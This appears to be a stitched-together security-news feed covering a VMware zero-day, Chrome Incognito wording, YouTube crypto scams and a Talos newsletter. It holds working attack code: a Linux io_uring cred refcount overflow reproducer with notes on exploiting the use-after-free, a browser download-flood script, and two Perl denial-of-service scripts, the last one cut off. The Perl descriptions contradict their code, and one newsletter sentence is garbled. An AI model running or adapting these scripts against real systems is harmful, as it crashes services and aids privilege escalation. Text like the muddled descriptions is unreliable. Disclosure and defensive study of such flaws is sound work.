An advanced China-nexus cyber espionage group previously linked to the exploitation of security flaws in VMware and Fortinet appliances has been linked to the abuse of a critical vulnerability in VMware vCenter Server as a zero-day since late 2021.
"UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further

Zero Day / Cyber Espionage

An advanced China-nexus cyber espionage group previously linked to the exploitation of security flaws in VMware and Fortinet appliances has been linked to the abuse of a critical vulnerability in VMware vCenter Server as a zero-day since late 2021.

"UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further demonstrates their capabilities," Google-owned Mandiant said in a Friday report.

The vulnerability in question is CVE-2023-34048 (CVSS score: 9.8), an out-of-bounds write that could be put to use by a malicious actor with network access to vCenter Server. It was fixed by the Broadcom-owned company on October 24, 2023.

The virtualization services provider, earlier this week, updated its advisory to acknowledge that "exploitation of CVE-2023-34048 has occurred in the wild."

UNC3886 first came to light in September 2022 when it was found to leverage previously unknown security flaws in VMware to backdoor Windows and Linux systems, deploying malware families like VIRTUALPITA and VIRTUALPIE.

The latest findings from Mandiant show that the zero-day weaponized by the nation-state actor targeting VMware was none other than CVE-2023-34048, allowing it to gain privileged access to the vCenter system, and enumerate all ESXi hosts and their respective guest virtual machines attached to the system.

The next phase of the attack involves retrieving cleartext "vpxuser" credentials for the hosts and connecting to them in order to install the VIRTUALPITA and VIRTUALPIE malware, thereby enabling the adversary to directly connect to the hosts.

This ultimately paves for the exploitation of another VMware flaw, (CVE-2023-20867, CVSS score: 3.9), to execute arbitrary commands and transfer files to and from guest VMs from a compromised ESXi host, as revealed by Mandiant in June 2023.

VMware vCenter Server users are recommended to update to the latest version to mitigate any potential threats.

In recent years, UNC3886 has also taken advantage of CVE-2022-41328 (CVSS score: 6.5), a path traversal flaw in Fortinet FortiOS software, to deploy THINCRUST and CASTLETAP implants for executing arbitrary commands received from a remote server and exfiltrating sensitive data.

These attacks specifically single out firewall and virtualization technologies owing to the fact that they lack support for endpoint detection and response (EDR) solutions in order to persist within target environments for extended periods of time.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Silently Weaponized VMware Zero-Day Flaw for 2 Years

Linux versions 5.6 and above appear to suffer from a cred refcount overflow when handling approximately 39 gigabytes of memory usage via io_uring.

    Linux >=5.6: cred refcount overflow at ~39 GiB memory usage via io_uring(see also my related prior bug reports about overflowing refcounts with lotsof RAM usage:https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAMhttps://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM)Since commit 071698e13ac6 (\"io_uring: allow registering credentials\"), landedin 5.6, it has been possible to grab references to `struct cred` veryefficiently - by repeatedly calling the syscall`io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0)`, it is possibleto register up to 0xffff refcounted pointers to `struct cred` in an xarray(or in older kernel versions, in an IDR). These pointers can all be pointingto the same `struct cred`.By using a bunch of io_uring instances, that makes it possible to create alot of refcounted references to `struct cred` at a very efficient and lowamortized memory cost of less than 10 bytes per reference.`struct cred` is refcounted using the member `atomic_t usage`, which is aplain signed 32-bit atomic counter with no overflow checking.I believe there is some history here where Elena Reshetova and Kees Cook havebeen trying to turn it into a `refcount_t`, which would also fix this kind ofissue by marking the refcount as \"saturated\" when it reaches 2^31 and thennever freeing the object. Most recently there was this thread, where Keestried to get that change in; there was some discussion, but I don't thinkanything has landed so far:<https://lore.kernel.org/all/20230818041740.gonna.513-kees@kernel.org/>So by using ~39 GiB of physical memory, it is possible to store 2^32references to `struct cred` and overflow the reference counter. That's notexactly a small amount of RAM, but I guess a lot of servers probably have thatmuch RAM? At least cloud providers like AWS sell machines with much more RAMthan that.I am including as recipients both akpm (who is the maintainer forkernel/cred.c and was involved in the linked discussion) and the io_uringmaintainers (though io_uring, in my opinion, isn't really where the core issuehere lies, but it happened to make it possible to hit this overflow using afairly small amount of physical memory).Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested itin a VM so that the host machine could swap a bit):============#define _GNU_SOURCE#include <pthread.h>#include <unistd.h>#include <err.h>#include <fcntl.h>#include <string.h>#include <stdio.h>#include <stdlib.h>#include <ctype.h>#include <signal.h>#include <sys/syscall.h>#include <sys/wait.h>#include <sys/prctl.h>#include <sys/mman.h>#include <sys/resource.h>#include <sys/eventfd.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})// power of 2#define PARALLELISM 4static int efd;static void *thread_fn(void *dummy) {  for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) {    struct io_uring_params params = {      .flags = IORING_SETUP_NO_SQARRAY    };    int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));    printf(\"uring_fd = 0x%x\\", (unsigned int)uring_fd);    for (int i=0; i<0xffff; i++, refcount++)      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0));  }  printf(\"one thread ready\\");  eventfd_write(efd, 1);  while (1) pause();}int main(void) {  setbuf(stdout, NULL);  sync();  struct rlimit rlim;  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));  if (rlim.rlim_max < 65550)    printf(\"WARNING: RLIMIT_NOFILE maximum is probably too low\\");  rlim.rlim_cur = rlim.rlim_max;  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));  efd = SYSCHK(eventfd(0, 0));  pthread_t threads[PARALLELISM];  for (int i = 0; i < PARALLELISM; i++) {    if (pthread_create(threads+i, NULL, thread_fn, NULL))      errx(1, \"pthread_create\");  }  for (int i=0; i<4;) {    eventfd_t val;    SYSCHK(eventfd_read(efd, &val));    i += val;  }  printf(\"refs should have wrapped. press ctrl+c for uaf on cleanup.\\");  while (1)    pause();}============The reproducer takes a while to run; when it's done and the cred refcount hasbeen wrapped, you can press ctrl+c to make the process exit, which willrepeatedly decrement the cred refcount until the cred refcount reaches zero(when there are actually 2^32 references remaining).At that point, it'll hit the `BUG_ON(cred == current->cred)` check in`__put_cred()`, since the reproducer doesn't go out of its way to avoid thischeck:============kernel BUG at kernel/cred.c:150!invalid opcode: 0000 [#1] PREEMPT SMPCPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014RIP: 0010:__put_cred+0x55/0x60Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938FS:  0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0PKRU: 55555554Call Trace: <TASK> [...] io_ring_ctx_wait_and_kill+0xa8/0x180 io_uring_release+0x20/0x30 __fput+0x92/0x2c0 task_work_run+0x5a/0x90 do_exit+0x36c/0xbc0 do_group_exit+0x37/0xa0 get_signal+0xbcf/0xbd0 arch_do_signal_or_restart+0x3e/0x270 exit_to_user_mode_prepare+0xba/0x110 syscall_exit_to_user_mode+0x21/0x50 do_syscall_64+0x52/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76RIP: 0033:0x7ff41d547d92Code: Unable to access opcode bytes at 0x7ff41d547d68.RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfffR13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000 </TASK>Modules linked in:---[ end trace 0000000000000000 ]---RIP: 0010:__put_cred+0x55/0x60Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938FS:  0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0PKRU: 55555554Fixing recursive fault but reboot is needed!============A use-after-free of `struct cred` should be exploitable; one method would beto try to get the freed object allocated again as the `struct cred` of aroot-privileged process, another method would be to try to reallocate theobject with a buffer containing attacker-controlled data somehow (and thenfake a full capability set in init_user_ns with UIDs set to zero).While one tempting easy fix here would be to close off avenues for gettinglots of references with little RAM (like somehow making io_uring reuse IDswith a local usage counter when userspace tries to insert the same`struct cred` into the xarray multiple times), I think that this example showshow fragile that method is. It requires knowing about all the variousreference paths that can hold references to `struct cred`, and what kinds ofmultipliers or global limits apply at every point in this reference graph.I think the kernel should be using some flavor of saturating refcounts as thedefault choice, at least on machines that have enough RAM to store 2^32pointers.If there are specific cases where the overhead is undesirable, I think weshould only omit such a check if we can document exactly how many referencescan exist at most, with enough warning comments scattered around to ensurethat the assumptions can't accidentally be broken inadvertently later on.(Or the kernel could limit SLUB to a maximum of 32 GiB of memory except forspecially marked slabs that store objects guaranteed to not hold multiplereferences to the same object, but I think people would probably hate thatidea.)(But note that refcount hardening also has value for protecting against bugswhere some repeatedly executed codepath forgets to decrement the refcount,letting it drift up until it wraps around; and that kind of bug is alsoexploitable without using ginormous amounts of RAM.)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-26.Found by: jannh@google.com

Linux 5.6 io_uring Cred Refcount Overflow

Firefox version 121 and Chrome version 120 may both suffer from a minor denial of service issue with file downloads.

    Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)Tested on: firefox 121 and chrome 120 on GNU/linuxDate: Thu Jan 18 08:38:28 AM UTC 2024This is barely a DoS, but since it might affect Chrome too we decidedto disclose it.If firefox user visits a specially crafted page, then firefoxmay create many files in `~/Downloads`,The user is notified about this in a small dialog, but there isno option to stop the downloads.The potential denial of service is that the user must manuallydelete the created files and this might be PITA especially ona phone.The code basically is:<pre>URL = "data:text/plain;,a";//can be very large with no net trafficlink = document.createElement('a');link.href = URL;link.download = 'joro_';document.body.appendChild(link);function f() {if( !confirm("This will ruin your device with probability up to 199.99%"))    return;setInterval("link.click();",1);//dobro}f();</pre>There is no network traffic and in about 90 seconds firefox 121 created3434 files at speed about 38 files/second.google chrome 120 prompts about multiple downloads, and if the userallows it, it creates files at speed of 4.2 files/second, butit gives modal prompts, which we couldn't close from the GUI andhad to kill the process.[Test online][1]: if you are vulnerable[1]: https://j.ludost.net/download2.html-- guninski

Firefox 121 / Chrome 120 Denial Of Service

MiniWeb HTTP Server version 0.8.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 19 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing    
# Notification vendor: No reported  
# Tested Version: MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=HbAy3RvHpAI

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41" x 2038;

    my $http_req = "POST /index.html HTTP/1.1\r\n";  
    $http_req .= "Host: $ip\r\n";  
    $http_req .= "From: header-data\r\n";  
    $http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
    $http_req .= $payload;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $host,  
    PeerPort => $port,  
    Proto    => 'tcp'  
) or die "[-] Could not connect\n";

$socket->send($http_req);  
$socket->close();

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

MiniWeb HTTP Server 0.8.1 Denial Of Service

Google wants you to know you can still be tracked when you're incognito.

Users of Chrome Canary have noticed some slight changes in the wording that Google uses for Incognito mode.

Chrome Canary is mainly intended for use by developers. It’s updated nearly daily with new features, and because it can be used alongside versions of the “normal” Chrome browser (known collectively as Chrome’s “Stable channel”), it can serve for testing and development purposes. So, these developers have access to the latest features and some of them noticed a few updates in the wording about Chrome’s Incognito mode.

Chrome’s Incognito mode aims to protect your privacy from other people who use the same device. It mitigates the risk of a spouse, roommate, or anyone on a public computer spying on your browsing habits. Private browsing mode does so by stopping your browser from saving your browsing information on your computer.

Incognito mode is also sometimes used for troubleshooting, because it ignores the installed browser extensions unless you specifically allow them to run in Incognito mode.

But, although the primary function of private browsing is to locally hide your browsing activity, Incognito mode has an interesting side effect—websites also see you as a new user when you come back in Incognito mode. This can come in handy, but should not be overrated.

You can open Incognito mode by clicking on the three dots in the right hand upper corner (More) of the browser menu and then on **New Incognito window.**

How to open an Incognito window

In the Stable channel build this is what you will see when you open an Incognito window.

> You’ve gone Incognito
> 
> Now you can browse privately, and other people who use this device won’t see your activity. However, downloads, bookmarks and reading list items will be saved.

The new warning seen in Chrome Canary when you open an incognito window says:

> “You’ve gone Incognito. Others who use this device won’t see your activity, so you can browse **more** privately. **This won’t change how data is collected by websites you visit and the services they use, including Google.**“

Image courtesy of MSPowerUser

It’s clear that Google has put more emphasis on users of the same device while moving away from the websites you visit. And it’s true that Incognito mode is primarily designed to keep your information private from other users of the same computer. It isn’t designed to keep your information private from the websites you visit, although that is sometimes a side effect. We have explained this in the past, but it’s noteworthy that Google has now added that it “won’t change how data is collected by websites you visit and the services they use, including Google.”

It’s generally assumed that the changes are tied to the fact that Google has indicated that it is ready to settle a class-action lawsuit filed in 2020 over the Incognito mode. Arising in the Northern District of California, the lawsuit accused Google of continuing to “track, collect, and identify \[users’\] browsing data in real time” even when they had opened a new Incognito window.

The judge rejected Google’s bid for summary judgement in August of 2023, pointing out that Google never revealed to its users that data collection continued even while surfing in Incognito mode.

Apparently many users, surely not our regular readers, where not aware that Incognito mode is not an anonymous mode. Websites and services, will still be able to track you and collect your data. Enabling the **Block third-party cookies** setting is more helpful.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Google changes wording for Incognito browsing in Chrome 

By Waqas
Bitdefender's latest research reveals that crypto scams on YouTube are at an all-time high, with no sign of slowing down in the near future.
This is a post from HackRead.com Read the original post: YouTube Crypto Con: Scammers Rake in $600K with Deepfakes and QR Codes

Hijacked accounts, hollow promises: Stream-jacked channels lure viewers with fake Bitcoin giveaways by utilizing deepfakes of popular celebrities, including Elon Musk, Ripple’s CEO Brad Garlinghouse, and Michael J. Saylor, former managing director of MicroStrategy, among many others.

Cybersecurity researchers at Bitdefender have published their latest research, highlighting a growing trend of YouTube stream-jacking campaigns using deepfake videos for cryptocurrency theft. The latest report continues the company’s research on YouTube-related malicious scams published in October 2023.

Despite companies like McAfee launching tools such as MockingBird, designed to detect 90% of deepfake content, scammers persist in employing malicious techniques to execute crypto scams. In some instances, they have managed to successfully bypass facial recognition systems, highlighting the ongoing challenges in combating these deceptive practices.

****Stream-Jacking****

For your information, YouTube stream-jacking is a cybercrime where criminals steal accounts from popular channels using livestream pop-ups, QR codes, and malicious links. Crypto-doubling scams lure viewers into depositing their cryptocurrency into platforms, promising quick returns. Victims are lured into depositing their funds, only to find their funds disappear without a trace.

As of the first week of January 2024, there were 2.70 billion active users on YouTube. These staggering stats make the video hosting platform a lucrative target for cybercriminals and scammers.

According to Bitdefender’s research, cybercriminals are enhancing their stream-jacking attacks by creating content that mimics legitimate cryptocurrency news or announcements. 

Stream-jacking 2.0 scams target popular channels for account takeover or lure followers to mimic channels with rewards. During their research, the researchers discovered that the top three highjacked accounts to carry these scams have over 31 million subscribers, with Tesla, MicroStrategy, and SpaceX being the top brands used. Bitdefender estimates that cyber criminals have netted over $600K so far.

****Fake YouTube Channels, Real Verification!****

Bitdefender’s blog post suggests that scammers use multiple announcements and high-profile news headlines to make their scams appear credible. For instance, attackers used the “SpaceX Starship integrated flight test 2” official event to launch fake livestreams under “SpaceX Launch Starship Flight Test! Elon Musk gives update on Starship!” on compromised channels.

Deepfake content helps scammers spread fraudulent schemes on compromised channels, using cryptocurrency-related videos of famous personalities, popular conference talks, and recordings. They encourage viewers to scan a QR code and send a certain amount of crypto to be doubled. Some deep fakes are of decent quality, but the live chat section is disabled unless a selected member or subscriber has been a long-term subscriber.

There is also a rising trend of using Deepfakes in YouTube ads rather than livestreams, providing more opportunities for cybercriminals to spread scams. Account takeovers are usually enabled by compromising YouTube access tokens with stealers.

Malicious actors revamp the channel to impersonate the entity they want to impersonate, likely through automated processes. The revamping process involves changes to the channel name, handle, visibility, avatar, banner, description, links, featured channels, and anything that can help identify the original channel.

Bitdefender researchers have identified signs of artificial boosting of viewers in most livestreams. In December 2023, malicious actors began broadcasting scams targeting the Bitcoin ETF, focusing on MicroStrategy and Michael Saylor.

One such example is scammers broadcasting using looped deepfakes relying on MicroStrategy’s former CEO to participate in giveaways by scanning QR codes and following instructions. Compromised channels use variations of the official MicroStrategy logo, official banners, and playlists to boost credibility.

Deepfake YouTube ad featuring Ripple’s CEO Brad Garlinghouse – Deepfake powered livestream featuring Michael J. Saylor, former managing director of MicroStrategy giving away Bitcoin – Fake and verified SpaceX YouTube account with millions of subscribers.

The most common names after the takeover are MicroStrategy US, MicroStrategy, Microstrategy, Microstrategy US, Microstrategy Live, and Micro Strategy. Subsequently, deceptive websites began to surface, hosted on domains mimicking the company’s name or its former CEO, often incorporating symbols associated with cryptocurrencies and multipliers.

These fraudulent sites featured animated presentations showcasing multiple transactions, designed to create the illusion of live activity. It’s important to note that these animations were randomly generated and did not reflect actual transactions, serving as a misleading tactic to convey a false sense of legitimacy.

****Protect Yourself from YouTube Crytp Scams!****

Crypto scams on YouTube are a serious issue. In 2020, Apple co-founder Steve Wozniak sued YouTube over Bitcoin scams using his name. Wozniak accused YouTube and Google of enabling Bitcoin giveaway scams by failing to take action against them.

To avoid becoming a victim of stream-Jacking 2.0, be cautious of unexpected changes in content, double-check links, avoid investing based on online endorsements, and thoroughly research investment opportunities.

Additionally, Enable two-factor authentication (2FA) on YouTube accounts to prevent unauthorized access. Remember that if something seems too good to be true, it could be a scam. Don’t let a deepfake fool you into losing your crypto.

****_RELATED ARTICLES_****

1.  **Fake YouTube Android Apps Used to Distribute CapraRAT**
2.  **New YouTube phishing scam using authentic email address**
3.  **YouTube Channels Hacked, Spread Lumma Stealer Malware**
4.  **British Military’s YouTube Account Hacked to Scam Crypto Users**
5.  **Google details cookie stealer malware campaign targeting YouTubers**

YouTube Crypto Con: Scammers Rake in $600K with Deepfakes and QR Codes

There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues.

Thursday, January 18, 2024 14:00

Welcome to 2024! 

The Threat Source newsletter is back after our winter break. 

When I wasn’t spending my downtime chasing around my toddler, one of my main projects was to upgrade the internet connection at my house. My ISP started offering Gigabit speeds and a 60 GHz connection, which was appealing to me as someone who is always on a quest to find the best way to stream PS5 games to my Steam Deck. 

This sent me down a path of reconfiguring my home network and re-adding a bunch of devices to a new network. And even though this sounds like a totally basic skill for anyone who works in cybersecurity, it was a big deal for me to set up a separate IoT-only network. 

Many readers may have even gotten a new IoT device for a holiday gift. This mobile projector was featured on several “Top Gifts of 2023” lists I was looking at in December, and there are always the slam dunk gifts of a new home AI assistant like Google Home or the Amazon Echo Show to control all things “smart” in your home. 

And we all know that, by being connected to the internet, many of these IoT devices are going to be vulnerable to adversaries. Last week, researchers found a network-connected torque wrench used in many industrial environments could be infected with ransomware.  

There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues, so I don’t think I need to run down those dangers in this newsletter. I wanted to take this space to share a few reminders and best practices of how to best set up these devices and manage them. This is a topic I covered previously in video format a few years ago, but I’m sure much of the UI/UX in this tutorial has changed since then, and I feel like I learned quite a bit from “YouTube University” over the past week or so in my own journey. 

*   Use network mapping software to track which devices connect to your network using what communication methods. NetworkMaps is a free, open-source option that I used when I was taking cybersecurity courses online.  
*   Create an IoT-specific network. This was super easy for me to do with the Gigabit-enabled router my ISP sent me, but I set up a network specifically for these devices to connect to (like my baby monitor, smart TVs, etc.) with a completely different network name and password from my “main” network. This keeps these devices segmented so that, if a bad guy is lurking, they stay on that IoT-specific network that doesn’t talk to your more sensitive devices like a work laptop. 
*   Make sure your router’s firewall is enabled, disable WPS and enable the WPA2 or WPA3 security protocol. 
*   Immediately change the default usernames and passwords that come with any new WiFi-connected device you’re setting up. 
*   Any home routers or IoT devices could point to OpenDNS servers for an additional (and free!) layer of security.
*   Disable any additional features or data-sharing you feel like you don’t need. The prime example of this for me is Amazon Sidewalk, the community network that allows Amazon devices to talk to one another and send alerts to users about various goings-on in their respective communities. The main drawback for me is that it allows your neighbors to pull off just a little of your internet bandwidth for their connected devices, too, and opens a whole slew of privacy concerns. 

**The one big thing **

Cisco Talos recently worked with fellow security company Avast to release a new version of the decryptor for the Babuk ransomware. Our researchers obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor in its latest variant. 

**Why do I care? **

Babuk is one of the most prevalent ransomware families in the wild right now, so any additional resources for victims to potentially recover faster, and for free, is good news. And Dutch Police, acting on threat intelligence supplied by Talos, identified, apprehended and the Dutch Prosecution Office prosecuted the threat actor behind Babuk Toa bad guy is lurkingtilla operations, demonstrating the power of cooperation between law enforcement agencies and commercial security organizations such as Talos and Avast.  

**So now what? **

The newest version of the decryptor is now available through No More Ransom, or directly on Avast’s website. Continued action from law enforcement to track down, apprehend and charge the operators behind ransomware is one of the many important steps we can take as a society and security community to reduce the prevalence of ransomware. 

**Top security headlines of the week **

**Security researchers are warning of actively exploited vulnerabilities in the Ivanti Connect Secure VPN** that, as of Wednesday, still did not have a patch available. The vulnerabilities are an authentication bypass flaw (CVE-2023-46805) and a command injection issue (CVE-2024-21887). An adversary could chain these vulnerabilities to execute arbitrary commands on the targeted appliance. Incident response firm Volexity said earlier this week that government agencies and military branches across the globe, as well as several Fortune 500 private companies. Chinese state-sponsored actor UTA0178 is suspected to be behind the exploitation of these vulnerabilities, some dating back to December. Ivanti says it is still developing patches for these issues, one of which may not be available until mid-February. In the meantime, users should follow the mitigation steps outlined by Ivanti, and implement a new scanner that can detect exploitation attempts. (DarkReading, SecurityWeek) 

**Britain’s national library is working to restore its online services 11 weeks after a cyber attack, though a full recovery may take until the end of the year.** The British Library started restoring read-only versions of its online catalog last week, including records of printed and rare books, maps, journals and music scores. The Rhysida ransomware group initially took credit for the attack in October 2023, claiming it was offering personal information for sale on the dark web. The library eventually confirmed that some employee data had been stolen in the attack, and it had to temporarily take its entire catalog offline. The attack also held up the payment system for which the library rewards authors and creators each time one of their works is checked out. (The Guardian, The New York Times) 

**Chinese government officials have apparently found a way to de-anonymize Apple AirDrop users to track anyone sharing content that’s outlawed by the country.** AirDrop is normally encrypted, and has been used previously to share messages, content and art with other iPhone users in public that is against the ruling Communist Party in China. But the Beijing municipal government's justice bureau says China-backed experts have found a way to carry out a complex encryption attack to reveal the original sender of the messages and prosecute them. In November 2022, Apple updated AirDrop settings so users in China could only opt-in to receive files from unknown contacts during a 10-minute window before it automatically shut off. The feature did not previously have a time limit. Translations of government statements indicate that the method involves what are known as “rainbow tables” to defeat the measures AirDrop has in place to obfuscate users' phone numbers and email addresses. (Ars Technica, CBS) 

**Can’t get enough Talos? **

*   Beers with Talos Ep. #142: Talos Speed Dating (the episode we never set out to make but did anyway) 
*   Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware 
*   Microsoft starts off new year with relatively light Patch Tuesday, no zero-days 
*   Video series discussing the major threat actor trends from 2023 
*   Year in Malware 2023: Recapping the major cybersecurity stories of the past year 

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31   
**MD5:** 2fb86be791b4bb4389e55df0fec04eb7   
**Typical Filename:** KMSAuto Net.exe   
**Claimed Product:** KMSAuto Net   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 36efad0617db0d45de00cc4f3cf49af7c2d6b5b15ca456d13703b5d366c58431   
**MD5:** 147c7241371d840787f388e202f4fdc1   
**Typical Filename:** EKSPLORASI.EXE   
**Claimed Product:** N/A    
**Detection Name:** Win32.Generic.497796 

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 39b0d4bad98713924775595834f1e07598a12c2622977578739222e09766066c   
**MD5:** a543017b4fa809e9f6b7251e7c14a5b0   
**Typical Filename:** a543017b4fa809e9f6b7251e7c14a5b0   
**Claimed Product:** N/A     
**Detection Name:** Auto.39B0D4BAD9.232061.in07.Talos

What to do with that fancy new internet-connected device you got as a holiday gift

SpyCamLizard version 1.230 remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: SpyCamLizard 1.230 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 18 january 2024# Vendor Homepage: http://www.spycamlizard.com# Download to demo: https://drive.google.com/file/d/1daFgHh0VzbkDzIp41-imZbPoc6ETZDq2/view?usp=sharing# Notification vendor: Yes reported# Tested Version: SpyCamLizard 1.230 - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://youtu.be/Ksg8L-ZX2Us#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The SpyCamLizard does not correctly handle the amount of data or bytes sent.#When authenticating to the SpyCamLizard with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $exploit = "x41" x 3000;my $httpsocket = IO::Socket::INET->new(    PeerAddr => $host,    PeerPort => $port,    Proto    => "tcp",);$httpsocket->send("GET " . $exploit . " HTTP/1.0\r\n\r\n");$httpsocket->close();    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] 